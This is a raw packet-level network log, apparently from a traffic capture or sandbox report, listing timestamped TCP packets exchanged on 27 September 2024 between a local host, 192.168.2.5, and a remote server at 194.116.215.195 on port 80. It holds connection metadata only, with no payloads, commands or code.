                                                                          Sep 27, 2024 04:21:07.069489002 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069499969 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069509029 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069519043 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069521904 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069531918 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069542885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069552898 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069552898 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069565058 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069577932 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069581985 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069588900 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069602966 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069606066 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069616079 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069627047 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069628954 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069653034 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069674969 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069820881 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069833040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069844007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069863081 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069879055 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069891930 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069899082 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069905996 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069916964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069928885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069935083 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069941044 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069952965 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069955111 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069964886 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.069966078 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.069996119 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070013046 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070200920 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070211887 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070221901 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070239067 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070245028 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070250988 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070262909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070269108 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070274115 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070286989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070297956 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070300102 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070310116 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070319891 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070322037 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070333958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070336103 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070347071 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070358992 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070358992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070372105 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070382118 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070384026 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070403099 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.070424080 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.070452929 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.157711029 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157799959 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157845020 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.157851934 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157877922 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.157902956 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.157906055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157938957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157952070 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.157974005 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.157979012 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158020020 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158026934 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158071041 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158081055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158123970 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158144951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158179045 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158190966 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158202887 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158222914 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158229113 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158243895 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158245087 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158260107 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158272028 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158276081 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158293962 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158298016 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158298016 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158308029 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158324003 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158334970 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158334970 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158340931 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158348083 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158355951 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158366919 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158369064 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158379078 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158384085 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158397913 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158406973 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158411026 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158447027 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158447027 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158461094 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158472061 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158474922 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158484936 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158494949 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158500910 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158508062 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158521891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158529043 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158534050 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158546925 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158552885 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158561945 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158586025 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158600092 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158658028 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158670902 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158682108 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158699036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158700943 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158710957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158721924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158724070 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158734083 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158746958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158757925 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158759117 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158770084 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158771992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158791065 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158801079 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158828020 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158874989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158886909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158899069 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158910036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158917904 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158921957 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.158947945 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.158982992 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159029007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159041882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159053087 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159064054 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159071922 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159075975 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159084082 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159090042 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159120083 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159136057 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159152985 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159166098 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159178019 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159197092 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159214973 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159312963 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159324884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159343958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159354925 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159357071 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159367085 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159379005 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159395933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159404993 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159409046 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159419060 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159425974 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159430981 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159465075 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159638882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159651041 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159662962 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159676075 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159683943 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159692049 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159703970 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159717083 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159718037 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159729958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159740925 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159746885 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159754992 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159765959 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159790039 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159837008 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.159961939 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159974098 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.159991980 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160002947 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160011053 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160016060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160026073 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160029888 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160043001 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160052061 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160063028 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160068035 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160077095 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160087109 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160095930 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160099983 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160121918 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160136938 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160212040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160223961 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160242081 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160250902 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160255909 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160265923 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160269022 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160279989 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160281897 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160295010 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160300016 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160307884 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160315990 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160320044 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160331964 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160343885 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160343885 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160356998 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160357952 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160370111 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160382986 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160413980 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160476923 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160511971 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160578012 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160589933 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160600901 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160613060 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160624981 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.160630941 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160650969 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.160666943 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.202531099 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202552080 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202564955 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202575922 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202589989 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202601910 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202611923 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202625036 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.202629089 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.202656984 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.202702999 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248285055 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248339891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248353004 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248363972 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248375893 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248377085 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248398066 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248399973 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248414040 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248425007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248435974 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248446941 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248447895 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248459101 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248471975 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248486996 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248507977 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248527050 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248538971 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248563051 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248568058 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248574018 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248589993 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248594046 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248619080 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248619080 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248646975 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248693943 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248707056 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248722076 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248739958 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248752117 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248764992 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248764992 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248768091 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248776913 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248785019 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248817921 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248861074 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248879910 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248892069 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248903036 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248914003 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248925924 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248927116 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248938084 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248950958 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248959064 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.248972893 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.248990059 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249006987 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249022007 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249034882 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249063015 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249080896 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249111891 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249124050 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249135017 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249145031 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249152899 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249157906 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249162912 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249178886 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249185085 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249213934 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249216080 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249228954 CEST8049713194.116.215.195192.168.2.5
                                                                          Sep 27, 2024 04:21:07.249242067 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249262094 CEST4971380192.168.2.5194.116.215.195
                                                                          Sep 27, 2024 04:21:07.249269962 CEST4971380192.168.2.5194.116.215.195
